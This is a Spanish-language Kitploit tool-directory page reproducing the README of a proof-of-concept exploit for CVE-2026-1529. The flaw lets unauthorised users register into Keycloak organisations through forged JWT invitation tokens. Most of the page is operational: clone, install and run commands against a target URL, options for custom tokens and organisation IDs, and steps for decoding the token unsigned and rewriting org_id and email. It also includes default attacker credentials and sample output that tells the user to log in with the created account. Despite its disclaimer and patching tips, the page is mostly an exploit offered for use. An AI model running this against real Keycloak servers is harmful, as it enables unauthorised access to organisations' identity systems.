Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Ver Repositorio
hace 6 mesesAún no revisado

Acerca de

CVE-2026-1529 (PoC) es una vulnerabilidad crítica en Keycloak que permite el registro no autorizado de organizaciones mediante una validación incorrecta de los tokens de invitación. Esta herramienta de explotación demuestra la vulnerabilidad manipulando tokens JWT para registrar usuarios en organizaciones no autorizadas.

Compartir

CVE-2026-1529 Herramienta de explotación de Keycloak

Keycloak: Registro no autorizado de organizaciones mediante una validación inadecuada del token de invitación


Aviso legal

Esta herramienta es solo para fines educativos y de pruebas de seguridad. Úsala únicamente en sistemas donde tengas permiso explícito para realizar pruebas. El acceso no autorizado a sistemas informáticos es ilegal y poco ético. Los autores de esta herramienta no son responsables de ningún uso indebido o daño causado por este software.

Creado por: f3ds cr3w est, 2002


Resumen

CVE-2026-1529 es una vulnerabilidad crítica en Keycloak que permite el registro no autorizado de organizaciones mediante una validación inadecuada del token de invitación. Esta herramienta de explotación demuestra la vulnerabilidad manipulando tokens JWT para registrar usuarios en organizaciones no autorizadas.

Detalles técnicos

  • ID de CVE: CVE-2026-1529
  • Software afectado: Keycloak (org.keycloak.services.resources.organizations)
  • Puntuación CVSS: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Vector de ataque: Red
  • Complejidad del ataque: Baja
  • Impacto: Acceso no autorizado a los recursos de la organización

Descripción de la vulnerabilidad

La vulnerabilidad existe en el proceso de validación de tokens JWT para las invitaciones a organizaciones. Los atacantes pueden manipular los campos org_id y email en el payload JWT, lo que les permite registrar usuarios en cualquier organización sin la autorización adecuada.


Instalación

Requisitos previos

  • Python 3.7 o superior
  • gestor de paquetes pip

Configuración

  1. Clona o descarga la herramienta de explotación:
root@kitploit:~
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Instala las dependencias requeridas:
root@kitploit:~
pip install -r requirements.txt
  1. Haz ejecutable el script de explotación:
root@kitploit:~
chmod +x keycloak-exploit.py

Uso

Uso básico

root@kitploit:~
# Standard usage with target URL
python keycloak-exploit.py https://target-keycloak.com

# Show help
python keycloak-exploit.py -h

# Show version
python keycloak-exploit.py -v

Uso avanzado

root@kitploit:~
# Use custom invitation token
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Use custom organization ID
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Use custom configuration file
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Enable debug logging
python keycloak-exploit.py -d https://target-keycloak.com

Opciones de línea de comandos


Salida

Explotación exitosa

Cuando la explotación es exitosa, verás una salida como la siguiente:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Explotación fallida

Si la explotación falla, verás:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Estructura del proyecto

root@kitploit:~
CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

Configuración

Configuración predeterminada

La herramienta utiliza un archivo de configuración predeterminado (config/default_config.json) con los siguientes ajustes:

root@kitploit:~
{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Configuración personalizada

Puedes crear un archivo de configuración personalizado y usarlo con la opción -c:

root@kitploit:~
{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Detalles técnicos

Proceso de explotación

  1. Análisis del objetivo: Comprueba si el objetivo es una instancia de Keycloak vulnerable
  2. Generación de token: Genera o utiliza un token de invitación personalizado
  3. Manipulación de token: Manipula el payload JWT para cambiar el ID de organización
  4. Registro de usuario: Registra un usuario utilizando el token manipulado
  5. Prueba de inicio de sesión: Verifica que el usuario creado pueda iniciar sesión
  6. Generación de informes: Crea un informe detallado de la explotación

Manipulación de JWT

La herramienta explota la validación JWT inadecuada de la siguiente manera:

  1. Decodificando el token JWT sin verificación de firma
  2. Modificando el campo org_id para apuntar a una organización diferente
  3. Modificando el campo email si es necesario
  4. Re-codificando el token con el payload manipulado

Consideraciones de seguridad

  • La herramienta utiliza un manejo de errores y registro adecuados
  • Todas las solicitudes de red incluyen cabeceras apropiadas
  • Se realiza validación de entrada en todas las entradas del usuario
  • La herramienta respeta los códigos de respuesta del servidor objetivo

Solución de problemas

Problemas comunes

  1. Errores de conexión

    • Comprueba si la URL objetivo es accesible
    • Verifica que el objetivo sea una instancia de Keycloak
    • Comprueba la conectividad de red y los ajustes del firewall
  2. Errores de validación de token

    • Asegúrate de que el formato del token sea correcto
    • Comprueba si el token contiene los campos requeridos (org_id, email, invitation_type)
    • Verifica que el token no haya expirado
  3. Fallos de registro

    • Comprueba si el endpoint de registro es accesible
    • Verifica el formato del token manipulado
    • Comprueba si el objetivo tiene habilitado el registro de organizaciones

Modo de depuración

Habilita el registro de depuración para una solución de problemas detallada:

root@kitploit:~
python keycloak-exploit.py -d https://target-keycloak.com

Archivos de registro

  • Registro principal: logs/exploit.log
  • Informes: output/reports/exploit_report_YYYYMMDD_HHMMSS.txt

Metodología de pruebas

Evaluación de vulnerabilidades

La herramienta realiza las siguientes comprobaciones:

  1. Comprobación de estado: Verifica que el objetivo sea una instancia de Keycloak
  2. Detección de versión: Intenta detectar la versión de Keycloak
  3. Prueba de endpoints: Prueba los endpoints relacionados con organizaciones
  4. Validación de token: Valida la estructura del token JWT

Validación de la explotación

La explotación se considera exitosa si:

  1. El objetivo es vulnerable
  2. Un usuario puede ser registrado utilizando el token manipulado
  3. El usuario registrado puede iniciar sesión correctamente
  4. Se genera un enlace de inicio de sesión válido

Buenas prácticas de seguridad

Para organizaciones

  1. Aplicar parches: Actualiza a la última versión de Keycloak
  2. Validación de token: Implementa una verificación adecuada de firma JWT
  3. Control de acceso: Restringe el registro de organizaciones a usuarios autorizados
  4. Monitoreo: Monitorea actividades de registro sospechosas
  5. Seguridad de red: Implementa reglas de firewall adecuadas

Para investigadores de seguridad

  1. Autorización: Solo prueba sistemas para los que tengas permiso
  2. Divulgación responsable: Reporta vulnerabilidades a los proveedores
  3. Documentación: Mantén registros detallados de tus pruebas
  4. Pruebas éticas: Sigue las prácticas de divulgación responsable

Licencia

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad. Úsala bajo tu propio riesgo.

Creado por: f3ds cr3w est, 2002

Contacto: Para preguntas o comentarios, consulta el repositorio del proyecto.


Historial de cambios

Versión 1.0

  • Versión inicial
  • Funcionalidad básica de explotación
  • Capacidades de manipulación de JWT
  • Generación de informes
  • Interfaz de línea de comandos

🙏 Agradecimientos

  • Equipo de desarrollo de Keycloak
  • Investigadores de seguridad que descubrieron CVE-2026-1529
  • La comunidad de seguridad de código abierto

Recuerda: Un gran poder conlleva una gran responsabilidad. Usa esta herramienta con sabiduría y ética.

por f3ds cr3w est, 2002

Descargar herramienta
OpciónDescripción¿Requerido?
targetURL objetivo de Keycloak (IP o dominio)Sí
-t, --tokenToken de invitación personalizado a usarNo
-o, --org-idID de organización personalizadoNo
-c, --configRuta al archivo de configuraciónNo
-d, --debugHabilita el registro de depuraciónNo
-v, --versionMuestra la información de versiónNo
-h, --helpMuestra el mensaje de ayudaNo